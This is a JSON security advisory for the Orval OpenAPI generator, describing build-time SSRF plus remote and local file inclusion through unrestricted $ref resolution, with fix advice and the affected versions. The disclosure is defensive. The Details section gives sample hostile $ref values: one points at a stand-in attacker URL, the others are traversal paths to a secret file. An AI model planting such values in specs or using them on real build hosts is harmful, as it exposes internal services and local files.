{"id":"GHSA-cxq5-97v7-87j8","summary":"Orval: Generation-time SSRF + remote/local file inclusion via unrestricted $ref","details":"### Summary\n\nOrval resolves OpenAPI `$ref`s by fetching remote `http(s)` URLs and reading local files (including\nabsolute / out-of-tree paths), inlining the referenced schema into the generated client. Running\n`orval` on a spec whose `$ref` points at an attacker/internal URL or an arbitrary local file yields\nSSRF, remote file inclusion, and local file inclusion. Verified on 8.19.0. This is a different class\nfrom Orval's published output-injection CVEs (CVE-2026-22785/23947/24132/25141), none of which covers\nthe `$ref` resolver.\n\n### Details\n\n- `$ref: http://attacker/internal-evil.json#/...` → build host fetches (SSRF) and inlines the remote\n  schema (RFI); confirmed property `REMOTE_ORVAL_PROP` in the generated client.\n- `$ref: /abs/path.json#/...` or `../../secret.json#/...` → out-of-tree local file read + inlined (LFI).\n\nNo RCE: on 8.19.0 the description JSDoc is escaped (`*/`-\u003e`*\\/`, the published fix), so `$ref` content\ncannot break out into code. The chain stops at SSRF + RFI + LFI.\n\nFix: don't resolve remote `$ref`s by default (opt-in + host allowlist); confine local `$ref`\nresolution to the input directory tree (reject absolute paths and `../` escapes).\n\n### PoC\n\n`reproduce.sh` attached: confirms LFI (out-of-tree read), SSRF (listener hit), RFI (remote schema\ninlined). Verified on Orval 8.19.0.\n\n### Impact\n\nBuild-time SSRF from the developer or CI host, disclosure of arbitrary local files, and inclusion of untrusted remote content, from running the generator on an attacker-controlled or attacker-influenced OpenAPI description. No code execution (output escaping is in place post the earlier fixes).","aliases":["CVE-2026-62680"],"modified":"2026-09-02T15:00:08.972025908Z","published":"2026-09-02T14:54:48Z","database_specific":{"nvd_published_at":"2026-08-19T18:16:54Z","cwe_ids":["CWE-22","CWE-829","CWE-918"],"severity":"HIGH","github_reviewed":true,"github_reviewed_at":"2026-09-02T14:54:48Z"},"references":[{"type":"WEB","url":"https://github.com/orval-labs/orval/security/advisories/GHSA-cxq5-97v7-87j8"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-62680"},{"type":"WEB","url":"https://github.com/orval-labs/orval/pull/3692"},{"type":"WEB","url":"https://github.com/orval-labs/orval/pull/3723"},{"type":"WEB","url":"https://github.com/orval-labs/orval/commit/23786c056f4eba38c02bf2968677988dbbe4de10"},{"type":"WEB","url":"https://github.com/orval-labs/orval/commit/8ef1bfdf3f9bcaf9dabfbe2e42887f1c0e159ab6"},{"type":"PACKAGE","url":"https://github.com/orval-labs/orval"},{"type":"WEB","url":"https://github.com/orval-labs/orval/releases/tag/v8.22.0"}],"affected":[{"package":{"name":"orval","ecosystem":"npm","purl":"pkg:npm/orval"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"8.22.0"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/09/GHSA-cxq5-97v7-87j8/GHSA-cxq5-97v7-87j8.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N"}]}